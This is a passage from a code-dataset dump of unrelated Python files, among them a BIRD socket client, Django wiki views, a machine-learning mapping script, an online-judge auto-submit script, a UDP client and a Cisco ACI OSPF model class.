datetime(int(value[:4]), int(value[5:7]), int(value[8:10]))\n except ValueError:\n pass\n\n # Case 3: HH:mm timestamp\n try:\n parsed_value = datetime.strptime(value, \"%H:%M\")\n result_date = datetime(\n now.year, now.month, now.day, parsed_value.hour, parsed_value.minute)\n\n if now.hour < parsed_value.hour or (now.hour == parsed_value.hour and now.minute < parsed_value.minute):\n result_date = result_date - timedelta(days=1)\n\n return result_date\n\n except ValueError:\n # It's a different format, keep on processing\n pass\n\n # Case 4: \"Jun13\" timestamp\n try:\n # Run this for a (fake) leap year, or 29 feb will get us in trouble\n parsed_value = datetime.strptime(\"1996 \" + value, \"%Y %b%d\")\n result_date = datetime(\n now.year, parsed_value.month, parsed_value.day)\n\n if now.month <= 
parsed_value.month and now.day < parsed_value.day:\n # This may have an off-by-one-day issue with leap years, but\n # that's not important\n result_date = result_date - timedelta(days=365)\n\n return result_date\n except ValueError:\n pass\n\n # Case 5: plain year\n try:\n year = int(value)\n return datetime(year, 1, 1)\n except ValueError:\n raise ValueError(\"Can not parse datetime: [%s]\" % value)\n\n def _send_query(self, query):\n \"\"\"Open a socket to the BIRD control socket, send the query and get\n the response.\n \"\"\"\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n sock.connect(self.socket_file)\n sock.send(query + \"\\n\")\n\n data = ''\n prev_data = None\n\n while (data.find(\"\\n0000\") == -1) and (data.find(\"\\n8003\") == -1) and (data.find(\"\\n0013\") == -1) and (data.find(\"\\n9001\") == -1) and (data.find(\"\\n8001\") == -1):\n data += sock.recv(1024)\n if data == prev_data:\n raise ValueError(\"Could not read additional data from BIRD\")\n prev_data = data\n\n sock.close()\n return str(data)\n\n def _clean_input(self, input):\n \"\"\"Clean the input string of anything not plain alphanumeric chars,\n return the cleaned string.\"\"\"\n return self.clean_input_re.sub('', input).strip()\n","sub_path":"pybird/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"361834149","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django import forms\nfrom markdown import markdown\nfrom random import choice\nfrom . import util\n\n# Search Form\nclass SearchForm(forms.Form):\n search = forms.CharField(label='', required=True, widget = forms.TextInput(attrs={'placeholder':'Search Encyclopedia', 'autocomplete':'off'}))\n\n# New Page Form\nclass NewPage(forms.Form):\n title = forms.CharField(widget=forms.TextInput(attrs={'style':'display:block; margin-bottom:1rem;'}))\n content = forms.CharField(widget=forms.Textarea(attrs={'style':'display:block; height:200px;'}))\n\n# Edit Page Form\nclass EditPage(forms.Form):\n content = forms.CharField(widget=forms.Textarea(attrs={'style':'display:block; height:200px;'}))\n\n# If \"/\" is visited, list of entries will be returned\ndef index(request):\n form = SearchForm(request.POST)\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries(),\n \"form\": form\n })\n\n# If \"/wiki\" is visited\ndef wiki(request, title):\n # If \"Edit\" was clicked on wiki page\n if request.method == \"POST\":\n return HttpResponseRedirect(f\"{reverse('wiki:edit')}?title={title}\")\n form = SearchForm(request.POST)\n # Get data from entry which has name that user inserted after /\n data = util.get_entry(title)\n # If data is None, render error page\n if not data:\n message = \"Page not found.\"\n return error(request, message)\n # With markdown library change data to html and render wiki/entry page\n html = markdown(data)\n return render(request, \"encyclopedia/wiki/wiki.html\", {\n \"title\": title,\n \"html\": html,\n \"form\": form\n })\n\n# If search is visited via link (GET) or via form submission (POST)\ndef search(request):\n form = SearchForm(request.POST)\n if request.method == \"POST\":\n # Create a new form with SearchForm class\n if form.is_valid():\n search = form.cleaned_data[\"search\"]\n return HttpResponseRedirect(f\"{reverse('wiki:search')}?search_term={search}\")\n else:\n # Create a new form 
with SearchForm class\n form = SearchForm(request.POST)\n # Assign form input to search_term variable\n search_term = request.GET.get(\"search_term\")\n # If search tearm is in markdown entries redirect to that term\n if search_term in util.list_entries():\n return HttpResponseRedirect(f\"wiki/{search_term}\")\n # For each entry where search term is substring pass to list which will be presented in HTML as list item\n entries = []\n no_results = \"\" \n for entry in util.list_entries():\n if search_term in entry:\n entries.append(entry)\n # If there is no result for search input, \"No results\" will be printed out\n if len(entries) < 1:\n no_results = \"No results.\"\n return render(request, \"encyclopedia/search.html\", {\n \"form\": form,\n \"entries\": entries,\n \"no_results\": no_results\n })\n\n# If new \"Create New Page\" is clicked\ndef new(request):\n form = SearchForm(request.POST)\n new_page_form = NewPage(request.POST)\n # Check if \"Create New Page\" is visited by link or is submited\n if request.method == \"POST\":\n title = request.POST.get(\"title\")\n content = request.POST.get(\"content\")\n # On button click check if same title exists\n if title not in util.list_entries():\n util.save_entry(title, content)\n # Redirect user to new entry's page\n return HttpResponseRedirect(f\"wiki/{title}\")\n # Return error if page with same title exists\n else:\n message = \"Page with same title already exists.\"\n return error(request, message)\n return render(request, \"encyclopedia/new.html\", {\n \"form\":form,\n \"new_page_form\":new_page_form\n })\n\n# If \"Random Page\" is clicked\ndef random(request):\n # Get random value from entries and redirect to that page\n value = choice(util.list_entries())\n return HttpResponseRedirect(f\"wiki/{value}\")\n\n\n\n# If \"Edit\" is clicked\ndef edit(request):\n form = SearchForm()\n # Get title from entry where \"Edit\" was clicked\n title = request.GET.get(\"title\")\n edit_form = EditPage(initial = {\"content\": util.get_entry(title)})\n\n if request.method == \"POST\":\n title = request.POST.get(\"title\")\n content = request.POST.get(\"content\")\n util.save_entry(title, content)\n return HttpResponseRedirect(f\"wiki/{title}\")\n\n return render(request, \"encyclopedia/edit.html\", {\n \"form\": form,\n \"title\": title,\n \"edit_form\": edit_form\n })\n\n\n# Error page\ndef error(request, message):\n form = SearchForm()\n return render(request, \"encyclopedia/error.html\", {\n \"form\": form,\n \"message\": message\n })","sub_path":"wiki/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"505679928","text":"import tensorflow as tf\n\nflags = tf.flags\n\nflags.DEFINE_string(\"mode\", \"train\", \"Running mode train/debug/test\")\n\ndef main(_):\n config = flags.FLAGS\n if config.mode == \"train\":\n print('this is train')\ndef test(_):\n print('this is test')\n\nif __name__ == \"__main__\":\n # 主函数中的tf.app.run()会调用main,并传递参数,因此必须在main函数中设置一个参数位置。\n # 如果要更换main名字,只需要在tf.app.run( )中传入一个指定的函数名即可。\n # default肯定是main啦\n tf.app.run(test)\n","sub_path":"test/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"66633456","text":"from MainProject.tweetCollection import tweetCollection\nfrom MainProject.priceCollection import priceCollection\nfrom MainProject.autoCollect import 
autoCollectThreading\nfrom MainProject.viewInterface import view\n\n\nclass Controller:\n def __init__(self):\n self.running = 1\n\n def chooseFunction(self):\n print(\"Welcome to Plutus. This program might make you rich!\")\n print(\"What would you like to do?\")\n print(\"Your choices: \\n 1. Collect tweets and crypto prices right now.\\n\"\n \"2. Collect tweets and crypto prices automatically.\\n\"\n \"3. Analyse a currency of your choice.\\n \"\n \"4. Convert the price of a cryptocurrency to the price of a FIAT currency.\")\n while self.running:\n choice = input(\"Please choose what you want to do. (1 / 2 / 3 / 4 ) \")\n if choice == \"1\":\n priceCollection().collectPrice()\n tweetCollection().callapi()\n break\n if choice == \"2\":\n print(\"Tweets will now be collected twice a day while this is running.\\n\"\n \"Cryptocurrency prices will be collected once every hour.\")\n autoCollectThreading().run()\n break\n if choice == \"3\":\n view()\n break\n if choice == \"4\":\n #converterFunction\n break\n\n print(\"This was not a valid input! Please try again.\")\n\n\n","sub_path":"Loser_Groups/Group_2/SourceFiles/MainProject/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"346942458","text":"import argparse\nimport json\nimport os\nimport pandas as pd\nimport time\nimport torch\nimport numpy as np\n\nimport train_methods\nimport query_methods\nimport utils_filereader\nfrom bhmtorch_cpu import BHM3D_PYTORCH, BHM_REGRESSION_PYTORCH, BHM_VELOCITY_PYTORCH\nfrom plot_methods import BHM_PLOTTER\n\n\"\"\"\n- features are the kernel distance thing to hinge points?\n- output is a scalar value (ie: the velocity long X-Y plane, X-Z plane, or Z-Y plane)?\n- How do you determine what the hinge points are?\n - query_dist in config file determines how frequently to space the hinge points?\n - How do you determine how big the total grid is on which to draw the hinge points?\n- What are the partitions?\n\n- What exactly is the model learning? How can information about whether or not a space is\noccupied, etc. 
be gleaned from the current features?\n\n- Try making regression grid 3d\n - will this break the plotting??\n\n- train velocity\n- query velocity\n\"\"\"\n\n\ndef load_query_data(path):\n \"\"\"\n @param path (str): path relative to query_data folder to save data\n \"\"\"\n filename = './query_data/{}'.format(path)\n print(' Reading queried output from ' + filename)\n return torch.load(filename)\n\n# ==============================================================================\n# Train\n# ==============================================================================\ndef train(fn_train, cell_max_min, cell_resolution):\n \"\"\"\n @params: [fn_train, cell_max_min, cell_resolution]\n @returns: []\n Fits the 3D BHM on each frame of the dataset and plots occupancy or regression\n \"\"\"\n print('\\nTraining started---------------')\n alpha = 10**-2\n beta = 10**2\n for framei in range(args.num_frames):\n if args.model_type == \"occupancy\" or args.model_type == \"regression\":\n g, X, y_occupancy, sigma, partitions = utils_filereader.read_frame(args, framei, fn_train, cell_max_min)\n elif args.model_type == \"velocity\":\n X, y_vx, y_vy, y_vz, partitions = utils_filereader.read_frame_velocity(args, framei, fn_train, cell_max_min)\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n\n if args.model_type == 'occupancy':\n train_methods.train_occupancy(args, partitions, cell_resolution, X, y_occupancy, sigma, framei)\n elif args.model_type == 'regression':\n train_methods.train_regression(args, alpha, beta, cell_resolution, cell_max_min, X, y_occupancy, g, sigma[:,:2], framei)\n # For regression, we use sigma dimension 2. This is hard coded in the pass to plot_regression for the sigma term above\n elif args.model_type == \"velocity\": ###===###\n train_methods.train_velocity(args, alpha, beta, X, y_vx, y_vy, y_vz, partitions, cell_resolution, cell_max_min, framei) ###///###\n\n if args.model_type == \"occupancy\" or args.model_type == \"regression\":\n del g, X, y_occupancy, sigma, partitions\n elif args.model_type == \"velocity\":\n del X, y_vx, y_vy, y_vz, partitions\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n print('Training completed---------------\\n')\n\n\n# ==============================================================================\n# Query\n# ==============================================================================\ndef query(fn_train, cell_max_min):\n \"\"\"\n @params: [fn_train, cell_max_min]\n @returns: []\n Queries the 3D BHM for occupancy or regression on each frame of the dataset\n \"\"\"\n print('Querying started---------------')\n for framei in range(args.num_frames):\n if args.model_type == \"occupancy\" or args.model_type == \"regression\":\n g, X, y_occupancy, sigma, partitions = utils_filereader.read_frame(args, framei, fn_train, cell_max_min)\n elif args.model_type == \"velocity\":\n X, y_vx, y_vy, y_vz, partitions = utils_filereader.read_frame_velocity(args, framei, fn_train, cell_max_min)\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n\n if args.model_type == 'occupancy':\n query_methods.query_occupancy(args, partitions, X, y_occupancy, framei)\n elif args.model_type == 'regression':\n query_methods.query_regression(args, cell_max_min, X, y_occupancy, g, framei)\n elif args.model_type == \"velocity\": ###===###\n query_methods.query_velocity(args, X, y_vx, y_vy, y_vz, partitions, cell_resolution, cell_max_min, framei) ###///###\n\n if 
args.model_type == \"occupancy\" or args.model_type == \"regression\":\n del g, X, y_occupancy, sigma, partitions\n elif args.model_type == \"velocity\":\n del X, y_vx, y_vy, y_vz, partitions\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n print('Querying completed---------------\\n')\n\n# ==============================================================================\n# Plot\n# ==============================================================================\ndef plot():\n \"\"\"\n @params: []\n @returns: []\n Plots data loaded from the args.save_query_data_path parameter\n \"\"\"\n print('Plotting started---------------')\n plotter = BHM_PLOTTER(args, args.plot_title, args.surface_threshold, args.query_dist, occupancy_plot_type=args.occupancy_plot_type)\n for framei in range(args.num_frames):\n if args.model_type == 'occupancy':\n print(\"\\nPlotting occupancy datapoints for frame %d ...\" % framei)\n occupancyPlot, X, y, framei = load_query_data('occupancy/{}_f{}'.format(args.save_query_data_path, framei))\n plotter.plot_occupancy_frame(occupancyPlot, X, y, framei)\n elif args.model_type == 'regression':\n print(\"\\nPlotting regression datapoints for frame %d ...\" % framei)\n meanVarPlot, filtered, framei, cell_max_min = load_query_data('regression/{}_f{}'.format(args.save_query_data_path, framei))\n plotter.plot_regression_frame(meanVarPlot, filtered, framei, cell_max_min)\n elif args.model_type == \"velocity\": ###===###\n X, y_vx, y_vy, y_vz, Xq_mv, mean_x, mean_y, mean_z, framei = load_query_data('velocity/{}_f{}'.format(args.save_query_data_path, framei))\n # print(\"(plot) X.shape:\", X.shape)\n # exit()\n plotter.plot_velocity_frame(X, y_vx, y_vy, y_vz, Xq_mv, mean_x, mean_y, mean_z, framei)\n print('Plotting completed---------------\\n')\n\n\n\n# ==============================================================================\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n # Settings Arguments\n parser.add_argument('--mode', type=str, help='tqp: Train Query and Plot, to: Train only, qo: Query only, po: Plot only')\n parser.add_argument('--num_frames', type=int, help='Number of data frames')\n parser.add_argument('--config', type=str, help='Path to the config to load relative to the config folder')\n parser.add_argument('--save_config', type=str, help='Saves the argparse config to path if set relative to the config folder')\n\n # Train Arguments\n parser.add_argument('--model_type', type=str, help='Model type (occupancy vs regression)')\n parser.add_argument('--likelihood_type', type=str, help='Likelihood type (Gamma, Gaussian)')\n parser.add_argument('--dataset_path', type=str, help='Path to dataset')\n parser.add_argument('--area_min', nargs=3, type=int, help='X Y Z minimum coordinates in bounding box (3 values)')\n parser.add_argument('--area_max', nargs=3, type=int, help='X Y Z maximum coordinates in bounding box (3 values)')\n parser.add_argument('--hinge_type', type=str, help='Hinge point type (grid or hit_locations)')\n parser.add_argument('--hinge_dist', nargs=3, type=int, help='X Y Z hinge point resolution (3 values)')\n parser.add_argument('--kernel_type', type=str, help='Type of RBF kernel: Vanilla RBF(), Convolution (conv), Wasserstein (wass)')\n parser.add_argument('--gamma', nargs='+', type=float, help='X Y Z Gamma (1-3 values)')\n parser.add_argument('--num_partitions', nargs=3, type=int, help='X Y Z number of partitions per axis (3 values)')\n 
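# A hedged sketch of the writer implied by load_query_data and plot() above;
# the real save happens inside query_methods (not shown in this record), so
# the exact call is an assumption. It simply mirrors the
# "query_data/<model_type>/<save_query_data_path>_f<frame>" layout that the
# loader expects.
import torch  # torch is already imported by the record above

def save_query_data(payload, model_type, save_path, framei):
    # e.g. ("occupancy", "toy3_run0", 1) -> ./query_data/occupancy/toy3_run0_f1
    filename = './query_data/{}/{}_f{}'.format(model_type, save_path, framei)
    torch.save(payload, filename)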
parser.add_argument('--partition_bleed', type=float, help='Amount of bleed between partitions for plot stitching')\n parser.add_argument('--save_model_path', type=str, help='Path to save each model \\\n (i.e. save_model_path is set to \\\"toy3_run0\\\", then the model at partition 1, frame 1 would save to \\\n mdls/occupancy/toy3_run0_f1_p1)'\n )\n\n # Query Arguments\n parser.add_argument('--query_dist', nargs=3, type=float, help='X Y Z Q-resolution (3 values). If any value is\\\n negative, a 4th value should be provided to slice the corresponding axis. If all negative, X_query=X_train.')\n parser.add_argument('--query_blocks', type=int, default=None, help='How many blocks to break the query method into')\n parser.add_argument('--eval_path', type=str, help='Path of the evaluation dataset')\n parser.add_argument('--eval', type=int, help='1=evaluate metrics, 0, otherwise. Use data in --eval_path, if given.')\n parser.add_argument('--save_query_data_path', type=str, help='Path save each set of queried data \\\n (i.e. save_model_path is set to \\\"toy3_run0\\\" and the model type is set to occupancy, \\\n then the model at frame 1 would save to query_data/occupancy/toy3_run0_f1_p1)'\n )\n\n # Plot Arguments\n parser.add_argument('--occupancy_plot_type', type=str, help='Plot occupancy as scatter or volumetric plot')\n parser.add_argument('--plot_title', type=str, help='')\n parser.add_argument('--surface_threshold', nargs=2, type=float, help='Minimum threshold to show surface prediction on plot. Min or [Min, Max]')\n\n args = parser.parse_args()\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n # Set arguments according to the following Priority (High->Low):\n # 1:CL provided arguments, 2: config provided arguments, 3:default arguments\n if args.config:\n config = json.load(open('./configs/' + args.config, 'r'))\n defaults = json.load(open('./configs/defaults', 'r'))\n for key in vars(args):\n if key == 'save_config': continue\n if getattr(args, key): continue\n if key in config and config[key]:\n args.__dict__[key] = config[key]\n else:\n args.__dict__[key] = defaults[key]\n if args.save_config:\n with open('./configs/' + args.save_config, 'w') as f:\n json.dump(args.__dict__, f, indent=2)\n assert len(args.gamma) <= 3, 'Cannot support gamma with greater than dimension 3.'\n\n fn_train, cell_max_min, cell_resolution = utils_filereader.format_config(args)\n\n global gamma_vals\n gamma_vals = [0.01, 0.1, 0.5, 1, 5, 10, 100, 200, 300]\n hinge_dist_factor = [1, 1.5, 2, 4]\n args.hinge_dist_orig = args.hinge_dist\n for fi in hinge_dist_factor:\n for gi in gamma_vals:\n args.gamma = [gi]\n args.hinge_dist = [args.hinge_dist_orig[0]/fi, args.hinge_dist_orig[1]/fi, args.hinge_dist_orig[2]/fi]\n args.report_notes = 'scale_factor={}; hinge_dist={}; gamma={}'.format(fi, args.hinge_dist, args.gamma)\n print('\\n=============================================')\n print(args.report_notes)\n\n if args.mode == 'tqp' or args.mode == 't':\n train(fn_train, cell_max_min, cell_resolution)\n if args.mode == 'tqp' or args.mode == 'q':\n query(fn_train, cell_max_min)\n if args.mode == 'tqp' or args.mode == 'p':\n plot()\n if args.mode == 'tq':\n train(fn_train, cell_max_min, cell_resolution)\n query(fn_train, cell_max_min)\n if args.mode == 'qp':\n query(fn_train, cell_max_min)\n plot()\n\n print(\"Mission 
complete!\\n\\n\")\n","sub_path":"spatun_crossval.py","file_name":"spatun_crossval.py","file_ext":"py","file_size_in_byte":12026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190155531","text":"\n\n#calss header\nclass _ROYAL():\n\tdef __init__(self,): \n\t\tself.name = \"ROYAL\"\n\t\tself.definitions = [u'belonging or connected to a king or queen or a member of their family: ', u'good or excellent, as if intended for or typical of royalty: ', u'big or great: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_royal.py","file_name":"_royal.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433685097","text":"import sys\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nuserID = '아이디' # 아이디 \nuserPW = '비밀번호' # 비밀번호\n\nlanguages = {\n 'python3' : {'code': '28', 'exts' : 'py'},\n 'cpp' : {'code': '1', 'exts' : 'cpp'},\n 'java' : {'code': '3', 'exts' : 'java'}\n}\n\nloginURL = 'https://www.acmicpc.net/signin'\nloginData = {'login_user_id': userID, 'login_password': userPW, 'next': '/', 'stack': '0'}\n\nprobNum = sys.argv[1]\ntry:\n lang = sys.argv[2]\nexcept:\n lang = 'python3' # 디폴트\n\nwith requests.Session() as sess:\n login = sess.post(loginURL, data=loginData)\n\n submitURL = 'https://www.acmicpc.net/submit/' + str(probNum)\n\n temp = bs(sess.get(submitURL).text, 'html.parser')\n csrf_key = temp.find('input', {'name': 'csrf_key'})['value']\n\n source = open(probNum+'.'+languages[lang]['exts'], mode='rt', encoding='utf-8')\n sourceCode = source.read()\n\n submitData = {\n 'problem_id': probNum,\n 'language': languages[lang]['code'],\n 'code_open': 'close', # close : 비공개 open : 공개, onlyaccepted : 맞았을 때만 공개\n 'source': sourceCode,\n 'csrf_key' : csrf_key\n }\n\n sub = sess.post(submitURL, data=submitData)\n judge = ''\n judgeStatus = ['맞았습니다!!','틀렸습니다', '런타임 에러', '시간 초과']\n\n while True:\n status = sess.get('https://www.acmicpc.net/status?user_id='+userID).text\n temp = bs(status, 'html.parser')\n judge = temp.find('span', {'class': 'result-text'}).text\n if judge in judgeStatus:\n sys.stdout.write('\\r***{}***'.format(judge))\n sys.stdout.write('\\n')\n break\n else:\n sys.stdout.write('\\r' + judge)","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"255701572","text":"# import library socket karena akan menggunakan IPC socket\nimport socket\n\n# definisikan target IP server yang akan dituju\nhost=\"10.20.1.250\"\n\n# definisikan target port number server yang akan dituju\nport = 50007\n\n#print (\"target IP:\", UDP_IP)\nprint(\"target ip : \", host)\n#print (\"target port:\", UDP_PORT)\nprint(\"target port : \", port)\n#print (\"pesan:\", PESAN)\npesan = \"udukudukudukuduk\"\nprint(\"pesan : \", pesan)\n\n# buat socket bertipe UDP\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n\n# lakukan loop 10 kali\nfor x in range (10):\n # definisikan pesan yang akan dikirim\n msg = pesan.encode()\n \n # kirim pesan\n s.sendto(msg, (host, port))\n \n 
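# The UDP client above fires ten datagrams at 10.20.1.250:50007. This is a
# minimal, hypothetical listener for the other end of that exchange, not part
# of the original file: SOCK_DGRAM needs no accept(), recvfrom() simply
# returns each datagram together with the sender's address.
import socket

recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recv_sock.bind(("", 50007))            # same port the client targets
for _ in range(10):                    # one recvfrom() per datagram sent
    payload, sender = recv_sock.recvfrom(4096)
    print(sender, payload.decode())
recv_sock.close()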
","sub_path":"TUGAS_SISTER_IPC_KEL8_IFIK4004/No.2/02.tugas_udp_client.py","file_name":"02.tugas_udp_client.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629710940","text":"from unittest import TestCase\nimport development\n\n\nclass TestModelDevelopment(TestCase):\n\n def test_model(self):\n # arrange\n train = development.train\n test = development.test\n X = development.X\n y = development.y\n\n # act\n file = open('model.pkl', 'rb')\n file.close()\n\n # assert\n assert len(train) == 891\n assert len(test) == 418\n assert len(X.columns) == 6\n assert len(y) == 891\n assert file\n","sub_path":"Chapter12/Activity12.01/test_development.py","file_name":"test_development.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"202332395","text":"# coding=UTF-8\n# **********************************************************************\n# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved\n# written by zen warriors, do not modify!\n# **********************************************************************\n\n\nfrom cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass CtxDef(Mo):\n \"\"\"\n The context-level OSPF definition.\n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.ospf.CtxDef\")\n\n meta.moClassName = \"ospfCtxDef\"\n meta.rnFormat = \"ospfCtxP\"\n meta.category = MoCategory.REGULAR\n meta.label = \"Context Policy Definition\"\n meta.writeAccessMask = 0x1\n meta.readAccessMask = 0x1\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n meta.childClasses.add(\"cobra.model.fault.Delegate\")\n\n meta.childNamesAndRnPrefix.append((\"cobra.model.fault.Delegate\", \"fd-\"))\n\n meta.parentClasses.add(\"cobra.model.fv.RtdEpP\")\n meta.parentClasses.add(\"cobra.model.l3ext.RtdOutDef\")\n meta.parentClasses.add(\"cobra.model.fv.BrEpP\")\n\n meta.superClasses.add(\"cobra.model.fabric.L3CtxPol\")\n meta.superClasses.add(\"cobra.model.fabric.ProtoPol\")\n meta.superClasses.add(\"cobra.model.ospf.ACtxPol\")\n meta.superClasses.add(\"cobra.model.fabric.ProtoDomPol\")\n meta.superClasses.add(\"cobra.model.naming.NamedObject\")\n meta.superClasses.add(\"cobra.model.pol.Obj\")\n meta.superClasses.add(\"cobra.model.pol.Def\")\n meta.superClasses.add(\"cobra.model.fabric.L3DomPol\")\n\n meta.rnPrefixes = [\n ('ospfCtxP', False),\n ]\n\n prop = PropMeta(\"str\", \"bwRef\", \"bwRef\", 1089, PropCategory.REGULAR)\n prop.label = \"Bandwidth Preference\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 4000000)]\n prop.defaultValue = 40000\n prop.defaultValueStr = \"40000\"\n meta.props.add(\"bwRef\", prop)\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n 
prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"ctrl\", \"ctrl\", 22755, PropCategory.REGULAR)\n prop.label = \"Control knobs\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop._addConstant(\"name-lookup\", \"enable-name-lookup-for-router-ids\", 2)\n prop._addConstant(\"pfx-suppress\", \"prefix-suppression\", 1)\n meta.props.add(\"ctrl\", prop)\n\n prop = PropMeta(\"str\", \"descr\", \"descr\", 5579, PropCategory.REGULAR)\n prop.label = \"Description\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 128)]\n prop.regex = ['[a-zA-Z0-9\\\\!#$%()*,-./:;@ _{|}~?&+]+']\n meta.props.add(\"descr\", prop)\n\n prop = PropMeta(\"str\", \"dist\", \"dist\", 1087, PropCategory.REGULAR)\n prop.label = \"Distance Preference\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 255)]\n prop.defaultValue = 110\n prop.defaultValueStr = \"110\"\n meta.props.add(\"dist\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"grCtrl\", \"grCtrl\", 1098, PropCategory.REGULAR)\n prop.label = \"Graceful Restart Controls\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.defaultValue = 1\n prop.defaultValueStr = \"helper\"\n prop._addConstant(\"helper\", \"graceful-restart-helper\", 1)\n meta.props.add(\"grCtrl\", prop)\n\n prop = PropMeta(\"str\", \"lcOwn\", \"lcOwn\", 9, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"local\"\n prop._addConstant(\"implicit\", \"implicit\", 4)\n prop._addConstant(\"local\", \"local\", 0)\n prop._addConstant(\"policy\", \"policy\", 1)\n prop._addConstant(\"replica\", \"replica\", 2)\n prop._addConstant(\"resolveOnBehalf\", \"resolvedonbehalf\", 3)\n meta.props.add(\"lcOwn\", prop)\n\n prop = PropMeta(\"str\", \"lsaArrivalIntvl\", \"lsaArrivalIntvl\", 1094, PropCategory.REGULAR)\n prop.label = \"Min Arrival Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(10, 600000)]\n prop.defaultValue = 1000\n prop.defaultValueStr = \"1000\"\n meta.props.add(\"lsaArrivalIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaGpPacingIntvl\", \"lsaGpPacingIntvl\", 1093, PropCategory.REGULAR)\n prop.label = \"Pacing Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 1800)]\n prop.defaultValue = 10\n prop.defaultValueStr = \"10\"\n meta.props.add(\"lsaGpPacingIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaHoldIntvl\", \"lsaHoldIntvl\", 1096, PropCategory.REGULAR)\n prop.label = \"Throttle Hold Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(50, 30000)]\n prop.defaultValue = 5000\n prop.defaultValueStr = \"5000\"\n meta.props.add(\"lsaHoldIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaMaxIntvl\", \"lsaMaxIntvl\", 1097, PropCategory.REGULAR)\n prop.label = \"Throttle Max Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(50, 30000)]\n prop.defaultValue = 5000\n prop.defaultValueStr = \"5000\"\n meta.props.add(\"lsaMaxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaStartIntvl\", \"lsaStartIntvl\", 1095, PropCategory.REGULAR)\n prop.label = \"Throttle Start Wait 
